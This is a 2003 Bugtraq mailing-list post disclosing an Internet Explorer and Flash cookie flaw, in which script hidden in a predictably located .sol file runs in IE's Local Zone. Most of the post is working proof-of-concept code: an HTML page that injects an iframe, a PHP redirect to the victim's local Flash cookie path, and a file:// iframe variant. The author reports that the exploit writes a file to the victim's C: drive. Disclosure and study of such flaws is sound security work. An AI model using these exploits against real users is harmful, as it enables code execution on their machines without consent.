Internet Explorer Vulnerability: Content-Location works with both triple and double slash

To: "Thor Larholm" <thor@xxxxxxxx>
Subject: Internet Explorer Vulnerability: Content-Location works with both triple and double slash
From: "Mindwarper *" <mindwarper@xxxxxxxxxxxxx>
Date: Sun, 02 Nov 2003 02:14:29 +0800
Cc: bugtraq@xxxxxxxxxxxxxxxxx
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

After I reported the Content-Location Vulnerability 
(http://www.securityfocus.com/archive/1/342317), 
Thor Larholm explained that the html execution was not caused by the 
Content-Location header, but instead 
by the triple slash (file:///). 
I have tested it with double slash and I even tested the triple slash without 
the Content-Location header, 
but neither worked.
The difference between triple slash and double slash is that in triple htm.html 
loads the cookie in the iframe,
and with double slash it causes the whole page to try and load the cookie which 
would then require the user
to press Back and then refresh the page.

I have created 2 proof-of-concepts which show how both vulnerabilities can not 
be exploited separately.

1. http://mlsecurity.com/ie/wee.php

This page will create a flash cookie and when you press continue it will load 
htm.html which contains an iframe. 
This iframe will load red.php which contains the Content-Location header 
pointing at the flash cookie. 
The flash cookie location will only have a double slash (file://).

wee.php  - Loads a flash movie which creates a cookie in 
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash 
Player/mlsecurity.com/mlsecurity.sol


htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>

document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D"
 + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + 
"%22%3E%3C/iframe%3E"));

</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank 
page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like 
my_Array0Sven1kelor2.
<p>

The script assumes you are under windows 2000/XP logged on as administrator.<br>


If you are not logged on as administrator type the username you're logged in 
under in the box below and press Go Go Go.<p>

<form method="GET">
Logged on to windows as user: <input type=text name="a" 
value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>

<p>

This should create a file called mlsecurity.txt in your c:\ drive.

<p>

<a href="exp.php">How it works?</a>

</html>
******************************

red.php
******************************
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
        $a="administrator";
}
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
        $d=$_GET["drive"];
}else
{
        $d="C";
}
 header("Location: file://".$d.":/Documents and Settings/".$a."/Application 
Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");

******************************





2. http://mlsecurity.com/ie/ie.php

This proof-of-concept only uses the triple slash method to open the cookie in 
an iframe.

ie.php - Loads a flash movie which creates a cookie in C:/Documents and 
Settings/administrator/Application Data/Macromedia/Flash 
Player/mlsecurity.com/mlsecurity.sol

htm2.html
******************************
<html>


        <iframe src="file:///C:/Documents and 
Settings/administrator/Application Data/Macromedia/Flash 
Player/mlsecurity.com/mlsecurity.sol"></iframe>

 <p>
Note: you might need to edit the html to fit your system.  
<p>

Macromedia Flash Player is reported to store Flash cookies (.sol files) in a 
predictable location on client systems.  
Other attacks are possible given the ability to store content on a system in a 
predictable location, such as 
referencing the content via a file:// URI.  This is compounded by the fact that 
an attacker could include HTML 
and script code in the cookie, which may be interpreted by Internet Explorer or 
possibly other browsers.  
In the example of Internet Explorer, such content would be interpreted in the 
context of the Local Zone.  
Successful exploitation would still require the attacker to guess the local 
username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft 
Windows operating systems.  
Other versions may also be affected.  Macromedia Director MX is similarly 
affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has 
been determined to be a distinct 
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with 
additional technical details 
describing a new issue in Internet Explorer.  The original report for these 
issues was a proof-of-concept
 provided by Mindwarper which exploited both of the issues simultaneously.
<p>


- Discovered by Mindwarper<br>
</html>

******************************


I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. 
I even tried using a few IE hacks and it still worked.

-----------------------------|
- Mindwarper                 |
- mindwarper@xxxxxxxxxxxxx   |
- http://mlsecurity.com      |
-----------------------------|

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

Prev by Date: Re: WU-FTPD 2.6.2 Freezer
Next by Date: [RHSA-2003:275-01] Updated CUPS packages fix denial of service
Previous by thread: BRS WebWeaver 1.06 remote DoS vulnerability
Next by thread: [RHSA-2003:275-01] Updated CUPS packages fix denial of service
Index(es):
- Date
- Thread